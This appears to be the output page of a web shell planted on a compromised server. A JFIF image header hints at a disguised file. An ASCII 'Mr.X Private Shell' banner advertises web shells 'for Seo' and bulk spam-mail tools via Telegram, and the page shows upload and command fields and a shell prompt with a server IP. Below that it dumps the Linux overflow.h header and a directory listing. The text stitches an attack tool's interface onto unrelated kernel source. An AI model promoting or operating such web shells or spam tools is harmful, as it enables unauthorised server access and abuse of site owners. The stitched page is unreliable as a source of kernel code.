����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
/* SPDX-License-Identifier: GPL-2.0 OR MIT */
#ifndef __LINUX_OVERFLOW_H
#define __LINUX_OVERFLOW_H

#include <linux/compiler.h>

/*
 * We need to compute the minimum and maximum values representable in a given
 * type. These macros may also be useful elsewhere. It would seem more obvious
 * to do something like:
 *
 * #define type_min(T) (T)(is_signed_type(T) ? (T)1 << (8*sizeof(T)-1) : 0)
 * #define type_max(T) (T)(is_signed_type(T) ? ((T)1 << (8*sizeof(T)-1)) - 1 : ~(T)0)
 *
 * Unfortunately, the middle expressions, strictly speaking, have
 * undefined behaviour, and at least some versions of gcc warn about
 * the type_max expression (but not if -fsanitize=undefined is in
 * effect; in that case, the warning is deferred to runtime...).
 *
 * The slightly excessive casting in type_min is to make sure the
 * macros also produce sensible values for the exotic type _Bool. [The
 * overflow checkers only almost work for _Bool, but that's
 * a-feature-not-a-bug, since people shouldn't be doing arithmetic on
 * _Bools. Besides, the gcc builtins don't allow _Bool* as third
 * argument.]
 *
 * Idea stolen from
 * https://mail-index.netbsd.org/tech-misc/2007/02/05/0000.html -
 * credit to Christian Biere.
 */
#define is_signed_type(type)       (((type)(-1)) < (type)1)
#define __type_half_max(type) ((type)1 << (8*sizeof(type) - 1 - is_signed_type(type)))
#define type_max(T) ((T)((__type_half_max(T) - 1) + __type_half_max(T)))
#define type_min(T) ((T)((T)-type_max(T)-(T)1))

/*
 * For simplicity and code hygiene, the fallback code below insists on
 * a, b and *d having the same type (similar to the min() and max()
 * macros), whereas gcc's type-generic overflow checkers accept
 * different types. Hence we don't just make check_add_overflow an
 * alias for __builtin_add_overflow, but add type checks similar to
 * below.
 */
#define check_add_overflow(a, b, d) ({		\
	typeof(a) __a = (a);			\
	typeof(b) __b = (b);			\
	typeof(d) __d = (d);			\
	(void) (&__a == &__b);			\
	(void) (&__a == __d);			\
	__builtin_add_overflow(__a, __b, __d);	\
})

#define check_sub_overflow(a, b, d) ({		\
	typeof(a) __a = (a);			\
	typeof(b) __b = (b);			\
	typeof(d) __d = (d);			\
	(void) (&__a == &__b);			\
	(void) (&__a == __d);			\
	__builtin_sub_overflow(__a, __b, __d);	\
})

#define check_mul_overflow(a, b, d) ({		\
	typeof(a) __a = (a);			\
	typeof(b) __b = (b);			\
	typeof(d) __d = (d);			\
	(void) (&__a == &__b);			\
	(void) (&__a == __d);			\
	__builtin_mul_overflow(__a, __b, __d);	\
})

/**
 * array_size() - Calculate size of 2-dimensional array.
 *
 * @a: dimension one
 * @b: dimension two
 *
 * Calculates size of 2-dimensional array: @a * @b.
 *
 * Returns: number of bytes needed to represent the array or SIZE_MAX on
 * overflow.
 */
static inline __must_check size_t array_size(size_t a, size_t b)
{
	size_t bytes;

	if (check_mul_overflow(a, b, &bytes))
		return SIZE_MAX;

	return bytes;
}

/**
 * array3_size() - Calculate size of 3-dimensional array.
 *
 * @a: dimension one
 * @b: dimension two
 * @c: dimension three
 *
 * Calculates size of 3-dimensional array: @a * @b * @c.
 *
 * Returns: number of bytes needed to represent the array or SIZE_MAX on
 * overflow.
 */
static inline __must_check size_t array3_size(size_t a, size_t b, size_t c)
{
	size_t bytes;

	if (check_mul_overflow(a, b, &bytes))
		return SIZE_MAX;
	if (check_mul_overflow(bytes, c, &bytes))
		return SIZE_MAX;

	return bytes;
}

static inline __must_check size_t __ab_c_size(size_t n, size_t size, size_t c)
{
	size_t bytes;

	if (check_mul_overflow(n, size, &bytes))
		return SIZE_MAX;
	if (check_add_overflow(bytes, c, &bytes))
		return SIZE_MAX;

	return bytes;
}

/**
 * struct_size() - Calculate size of structure with trailing array.
 * @p: Pointer to the structure.
 * @member: Name of the array member.
 * @n: Number of elements in the array.
 *
 * Calculates size of memory needed for structure @p followed by an
 * array of @n @member elements.
 *
 * Return: number of bytes needed or SIZE_MAX on overflow.
 */
#define struct_size(p, member, n)					\
	__ab_c_size(n,							\
		    sizeof(*(p)->member) + __must_be_array((p)->member),\
		    sizeof(*(p)))

#endif /* __LINUX_OVERFLOW_H */

Filemanager

Name Type Size Permission Actions
sched Folder 0755
unaligned Folder 0755
align.h File 339 B 0644
arm-smccc.h File 5.63 KB 0644
atomic.h File 363 B 0644
bitfield.h File 5.33 KB 0644
bitmap.h File 4.82 KB 0644
bitops.h File 2.15 KB 0644
bits.h File 1.17 KB 0644
btf_ids.h File 5.97 KB 0644
bug.h File 442 B 0644
build_bug.h File 3.04 KB 0644
compiler-gcc.h File 1.24 KB 0644
compiler.h File 5.82 KB 0644
compiler_types.h File 1.09 KB 0644
const.h File 421 B 0644
coresight-pmu.h File 2.32 KB 0644
ctype.h File 1.9 KB 0644
debug_locks.h File 288 B 0644
delay.h File 117 B 0644
err.h File 1.99 KB 0644
export.h File 129 B 0644
filter.h File 9.59 KB 0644
find.h File 5.77 KB 0644
ftrace.h File 120 B 0644
gfp.h File 322 B 0644
gfp_types.h File 46 B 0644
hardirq.h File 280 B 0644
hash.h File 2.93 KB 0644
hashtable.h File 4.44 KB 0644
interrupt.h File 129 B 0644
interval_tree_generic.h File 6.7 KB 0644
irqflags.h File 1.37 KB 0644
jhash.h File 4.46 KB 0644
kallsyms.h File 646 B 0644
kconfig.h File 2.39 KB 0644
kern_levels.h File 954 B 0644
kernel.h File 2.64 KB 0644
linkage.h File 123 B 0644
list.h File 22.48 KB 0644
list_sort.h File 374 B 0644
lockdep.h File 1.43 KB 0644
log2.h File 4.46 KB 0644
math.h File 764 B 0644
math64.h File 1.22 KB 0644
module.h File 270 B 0644
mutex.h File 117 B 0644
nmi.h File 0 B 0644
numa.h File 292 B 0644
objtool_types.h File 1.8 KB 0644
overflow.h File 4.11 KB 0644
poison.h File 2.5 KB 0644
proc_fs.h File 123 B 0644
rbtree.h File 9.32 KB 0644
rbtree_augmented.h File 9.34 KB 0644
rcu.h File 437 B 0644
refcount.h File 4.11 KB 0644
ring_buffer.h File 2.4 KB 0644
rwsem.h File 920 B 0644
seq_file.h File 126 B 0644
sizes.h File 1.12 KB 0644
slab.h File 1.17 KB 0644
spinlock.h File 1.24 KB 0644
stacktrace.h File 678 B 0644
static_call_types.h File 2.74 KB 0644
string.h File 1.4 KB 0644
stringify.h File 380 B 0644
time64.h File 347 B 0644
types.h File 1.72 KB 0644
zalloc.h File 252 B 0644